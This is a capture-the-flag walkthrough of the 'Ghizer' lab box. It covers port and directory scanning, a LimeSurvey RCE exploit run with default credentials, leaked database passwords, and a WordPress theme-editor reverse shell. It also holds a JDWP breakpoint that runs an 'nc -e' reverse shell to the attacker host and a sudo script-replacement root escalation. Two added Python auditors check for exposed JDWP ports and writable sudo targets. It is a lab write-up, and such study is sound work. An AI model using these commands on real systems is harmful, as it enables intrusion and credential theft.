thm-ghizer-public

Nmap

Let’s start by running a port scan on the host using nmap.
The output of the scan can be seen below:

nmap -v -sS -sV 10.10.40.50

Nmap scan report for 10.10.40.50
Host is up (0.088s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))

Port 21 (ftp)

Anonymous authentication is not enabled on this FTP service.

Port 80 (http)

LimeSurvey, an advanced online survey system for creating online surveys, is running on this port.

Port 443 (https)

Here we find a WordPress site with a note that the default /wp-login page has been hidden.

Directory Brute-Forcing

gobuster dir -e -u http://10.10.40.50 -w /usr/share/wordlists/dirb/common.txt -x txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.40.50
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/04/05 07:39:01 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.40.50/.hta                 (Status: 403) [Size: 276]
http://10.10.40.50/.hta.txt             (Status: 403) [Size: 276]
http://10.10.40.50/.htaccess            (Status: 403) [Size: 276]
http://10.10.40.50/.htpasswd.txt        (Status: 403) [Size: 276]
http://10.10.40.50/.htaccess.txt        (Status: 403) [Size: 276]
http://10.10.40.50/.htpasswd            (Status: 403) [Size: 276]
http://10.10.40.50/admin                (Status: 301) [Size: 310] [--> http://10.10.40.50/admin/]
http://10.10.40.50/application          (Status: 301) [Size: 316] [--> http://10.10.40.50/application/]
http://10.10.40.50/assets               (Status: 301) [Size: 311] [--> http://10.10.40.50/assets/]     
http://10.10.40.50/docs                 (Status: 301) [Size: 309] [--> http://10.10.40.50/docs/]       
http://10.10.40.50/framework            (Status: 301) [Size: 314] [--> http://10.10.40.50/framework/]  
http://10.10.40.50/index.php            (Status: 200) [Size: 40931]                                    
http://10.10.40.50/installer            (Status: 301) [Size: 314] [--> http://10.10.40.50/installer/]  
http://10.10.40.50/locale               (Status: 301) [Size: 311] [--> http://10.10.40.50/locale/]     
http://10.10.40.50/plugins              (Status: 301) [Size: 312] [--> http://10.10.40.50/plugins/]    
http://10.10.40.50/server-status        (Status: 403) [Size: 276]                                      
http://10.10.40.50/tests                (Status: 301) [Size: 310] [--> http://10.10.40.50/tests/]      
http://10.10.40.50/themes               (Status: 301) [Size: 311] [--> http://10.10.40.50/themes/]     
http://10.10.40.50/tmp                  (Status: 301) [Size: 308] [--> http://10.10.40.50/tmp/]        
http://10.10.40.50/upload               (Status: 301) [Size: 311] [--> http://10.10.40.50/upload/]     

Navigating to the discovered /admin resource, we find a login portal.

Using the default LimeSurvey credentials admin:password, we can successfully log in.

The running LimeSurvey version is 3.15.9.


LimeSurvey Exploitation

Using searchsploit, we find that there is an RCE exploit for LimeSurvey versions < 3.16.

searchsploit limesurvey
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
LimeSurvey (PHPSurveyor 1.91+ stable) - Blind SQL Injection                        | php/webapps/18508.txt
LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion                           | php/webapps/4156.txt
LimeSurvey 1.52 - 'language.php' Remote File Inclusion                             | php/webapps/4544.txt
LimeSurvey 1.85+ - 'admin.php' Cross-Site Scripting                                | php/webapps/35787.txt
LimeSurvey 1.92+ build120620 - Multiple Vulnerabilities                            | php/webapps/19330.txt
LimeSurvey 2.00+ (build 131107) - Multiple Vulnerabilities                         | php/webapps/29789.txt
LimeSurvey 3.17.13 - Cross-Site Scripting                                          | php/webapps/47386.txt
LimeSurvey 4.1.11 - 'File Manager' Path Traversal                                  | php/webapps/48297.txt
LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting             | php/webapps/48523.txt
LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting                | php/webapps/48289.txt
LimeSurvey 4.3.10 - 'Survey Menu' Persistent Cross-Site Scripting                  | php/webapps/48762.txt
LimeSurvey < 3.16 - Remote Code Execution                                          | php/webapps/46634.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Gaining Access

This exploit can be found on Exploit-DB. The vulnerable versions are affected by a PHP deserialization attack through the “phar://” stream wrapper.

Running the exploit with the default credentials found earlier gives us a shell as the www-data user.

python 46634.py http://10.10.40.50 admin password
[*] Logging in to LimeSurvey...
[*] Creating a new Survey...
[+] SurveyID: 231443
[*] Uploading a malicious PHAR...
[*] Sending the Payload...
[*] TCPDF Response: <strong>TCPDF ERROR: </strong>[Image] Unable to get the size of the image: phar://./upload/surveys/231443/files/malicious.jpg
[+] Pwned! :)
[+] Getting the shell...
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Performing basic manual enumeration, we find a config.php for LimeSurvey.

$ find / -type f -name "config.php" 2>/dev/null
/var/www/html/wordpress/wp-content/plugins/akismet/views/config.php
/var/www/html/limesurvey/framework/messages/config.php
/var/www/html/limesurvey/application/config/config.php
/var/www/html/limesurvey/third_party/kcfinder/conf/config.php

cat /var/www/html/limesurvey/application/config/config.php

This file contains the database credentials of a user called Anny.

. . .
return array(
	'components' => array(
		'db' => array(
			'connectionString' => 'mysql:host=localhost;port=3306;dbname=limedb;',
			'emulatePrepare' => true,
			'username' => 'Anny',
			'password' => 'P4$W0RD!!#S3CUr3!',
			'charset' => 'utf8mb4',
			'tablePrefix' => 'lime_',
		),
. . .

WordPress Exploitation

In the Meta section, there is a Log In link that redirects us to the hidden login portal at ?devtools. There we can use the credentials found above to log in as Anny.

Gaining Access

From previous experience exploiting WordPress, we know that we can get a reverse shell through the theme editor.

We will navigate to Appearance -> Editor, choose /archive.php and replace its content with a PHP reverse shell.
After editing the IP address and the desired port, we press the Update file button.

Before visiting the updated PHP file, don’t forget to start a listener on your local machine.
Then we navigate to
http://10.10.40.50/wp-content/themes/{themename}/archive.php
and gain access as the www-data user.


Lateral Movement

Performing basic manual system enumeration, we find that, besides other services, there is one listening on port 18001. This is the JDWP debug port that Ghidra opens when launched in debug mode, exposed on all interfaces.

Ghidra is a Java-based reverse engineering framework that features a graphical user interface (GUI) and has been designed to run on a variety of platforms including Windows, macOS, and Linux.

$ netstat -tulnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:18001         0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::34051                :::*                    LISTEN      -               
tcp6       0      0 :::37805                :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::18002                :::*                    LISTEN      -               
tcp6       0      0 ::1:631                 :::*                    LISTEN      -               
tcp6       0      0 :::443                  :::*                    LISTEN      -               
tcp6       0      0 :::443                  :::*                    LISTEN      -               
tcp6       0      0 :::443                  :::*                    LISTEN      -               
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           -               
udp        0      0 0.0.0.0:33149           0.0.0.0:*                           -               
udp        0      0 0.0.0.0:631             0.0.0.0:*                           -               
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               
udp6       0      0 :::5353                 :::*                                -               
udp6       0      0 :::58160                :::*                                -               
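On the defensive side, the exposure comes from how the JVM's debug agent is configured, not from Ghidra itself. The checker below is an added example, neither Ghidra's nor the writeup's own code: it parses the -agentlib:jdwp options out of JVM command lines and reports whether a listening debug socket is bound to loopback or reachable from the network. The process list, PIDs, ports and the Ghidra-style command line are constructed; the JDK-version rule is the documented default (bare port binds loopback from JDK 9 on, all interfaces before).

```python
import re

# JDWP agent options appear as -agentlib:jdwp=k=v,... (or the legacy -Xrunjdwp:k=v,...).
JDWP_RE = re.compile(r"-(?:agentlib:jdwp=|Xrunjdwp:)(?P<opts>\S+)")
LOOPBACK = {"127.0.0.1", "localhost", "::1"}

def parse_jdwp(cmdline):
    """Return the JDWP agent options of a JVM command line as a dict, or None if absent."""
    m = JDWP_RE.search(cmdline)
    if m is None:
        return None
    return dict(kv.partition("=")[::2] for kv in m.group("opts").split(","))

def assess_jdwp(cmdline, jdk_major=11):
    """Classify the debug agent: None (no agent), 'client', 'local' or 'exposed'."""
    opts = parse_jdwp(cmdline)
    if opts is None:
        return None
    if opts.get("server", "n") != "y":
        return "client"        # the JVM dials out to a debugger; nothing is listening
    if opts.get("transport") == "dt_shmem":
        return "local"         # Windows shared-memory transport, not reachable over the network
    host, sep, _port = opts.get("address", "").rpartition(":")
    if not sep:
        # Bare port number: JDK 9+ binds loopback only, JDK 8 and older bind every interface.
        return "local" if jdk_major >= 9 else "exposed"
    return "local" if host.strip("[]") in LOOPBACK else "exposed"

def audit_processes(ps_lines, jdk_major=11):
    """For 'PID COMMAND' lines (as from ps -eo pid,args), return [(pid, verdict)] for JVMs running JDWP."""
    findings = []
    for line in ps_lines:
        pid, _, cmd = line.strip().partition(" ")
        verdict = assess_jdwp(cmd, jdk_major)
        if verdict is not None:
            findings.append((int(pid), verdict))
    return findings

# Constructed process list (PIDs, paths and the Ghidra-style command line are made up):
# one debug listener reachable from the network, one bound to loopback, one JVM without an agent.
SAMPLE_PS = [
    "2417 java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:18001 ghidra.GhidraRun",
    "2550 java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=127.0.0.1:18002 -jar app.jar",
    "2601 java -jar /opt/app/service.jar",
]
```

Any 'exposed' result on a production host is a finding in its own right; even a 'local' listener is reachable by every local user, which is the path taken in this writeup.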

It is possible to achieve RCE through the JDWP debug port; we proceed according to the PoC video. The main idea is to set a breakpoint in a class's run() method. When the breakpoint is hit, we execute a Java reverse shell.

www-data@ubuntu:/$ jdb -attach 127.0.0.1:18001
jdb -attach 127.0.0.1:18001
Set uncaught java.lang.Throwable
Set deferred uncaught java.lang.Throwable
Initializing jdb ...
> classpath
classpath
base directory: /home/veronica
classpath: [/home/veronica/ghidra_9.0/support/../Ghidra/Framework/Utility/lib/Utility.jar]
> classes
. . .
> stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
> 
Breakpoint hit: "thread=Log4j2-TF-4-Scheduled-1", org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run(), line=96 bci=0

Log4j2-TF-4-Scheduled-1[1] print new java.lang.Runtime().exec("nc -e 10.9.140.180 8888 /bin/sh")

In the output below, we can see that we received a shell as the user veronica.

nc -lnvp 8888
listening on [any] 8888 ...
connect to [10.9.140.180] from (UNKNOWN) [10.10.98.112] 55378
id
uid=1000(veronica) gid=1000(veronica) groups=1000(veronica),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
python -c 'import pty;pty.spawn("/bin/bash")';
veronica@ubuntu:~$ wc user.txt
wc user.txt
 1  1 70 user.txt

Privilege Escalation

By issuing sudo -l, we can see which commands we may execute as root, along with other useful information.

veronica@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for veronica on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User veronica may run the following commands on ubuntu:
    (ALL : ALL) ALL
    (root : root) NOPASSWD: /usr/bin/python3.5 /home/veronica/base.py

Based on the output above, we can run base.py as the root user. Although base.py is owned by root, it lives in veronica's own home directory, which she can write to, so the file can be deleted and replaced.
We will delete this file and create a Python script with the same name containing a one-liner that spawns a bash shell as root.

veronica@ubuntu:~$ ls -la
ls -la
total 152
drwxr-xr-x 22 veronica veronica 4096 Apr  5 07:05 .
drwxr-xr-x  3 root     root     4096 Jul 23  2020 ..
-rw-r--r--  1 root     root       86 Jul 23  2020 base.py
. . .
veronica@ubuntu:~$ rm -rf /home/veronica/base.py
veronica@ubuntu:~$ echo 'import pty;pty.spawn("/bin/bash")' > base.py
veronica@ubuntu:~$ sudo /usr/bin/python3.5 /home/veronica/base.py
sudo /usr/bin/python3.5 /home/veronica/base.py
root@ubuntu:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~# wc /root/root.txt
wc /root/root.txt
 1  1 70 /root/root.txt

Because NOPASSWD is set for this command, we can execute our replacement base.py and get a root shell.
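The root cause of this escalation is a sudo rule whose script sits in a directory the invoking user can write to, so the root-owned file can be deleted and recreated. The audit below is an added example, not part of the original writeup: it parses `sudo -l` output in the format shown above and reports any absolute path in a rule that the given user could modify or replace, using plain mode-bit semantics (no root special-casing). The uid/gid values and the directory layout used to exercise it are assumptions.

```python
import os
import re
import stat

# One command rule as printed by `sudo -l`, e.g. "(root : root) NOPASSWD: /usr/bin/python3.5 /home/veronica/base.py".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

def parse_sudo_l(output):
    """Return [(runas, tags, argv)] for every command rule in `sudo -l` output."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if m:
            tags = m.group("tags").replace(":", " ").split()
            rules.append((m.group("runas").strip(), tags, m.group("cmd").split()))
    return rules

def writable_by(st, uid, gids):
    """Plain mode-bit check: may a non-root user with this uid/gids write to the inode?"""
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def replaceable(path, uid, gids):
    """True if the user can change the file's content, or delete it and put their own in its place."""
    path = os.path.abspath(path)
    parent_st = os.lstat(os.path.dirname(path))
    try:
        file_st = os.lstat(path)
    except FileNotFoundError:
        return writable_by(parent_st, uid, gids)   # target missing: the user could create it
    if writable_by(file_st, uid, gids):
        return True
    # Unlinking needs write access on the parent; a sticky parent restricts that to the owners.
    if parent_st.st_mode & stat.S_ISVTX and file_st.st_uid != uid and parent_st.st_uid != uid:
        return False
    return writable_by(parent_st, uid, gids)

def audit_sudo_rules(output, uid, gids):
    """Return [(runas, path)] for every absolute path in a rule that the user could modify or replace."""
    findings = []
    for runas, _tags, argv in parse_sudo_l(output):
        for arg in argv:
            if arg.startswith("/") and replaceable(arg, uid, gids):
                findings.append((runas, arg))
    return findings
```

Run on the host as the rule's user (os.getuid(), set(os.getgroups())), it reports /home/veronica/base.py for the rule above because the home directory, not the file, is writable; the fix is to move the script into a root-owned directory such as /usr/local/sbin.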
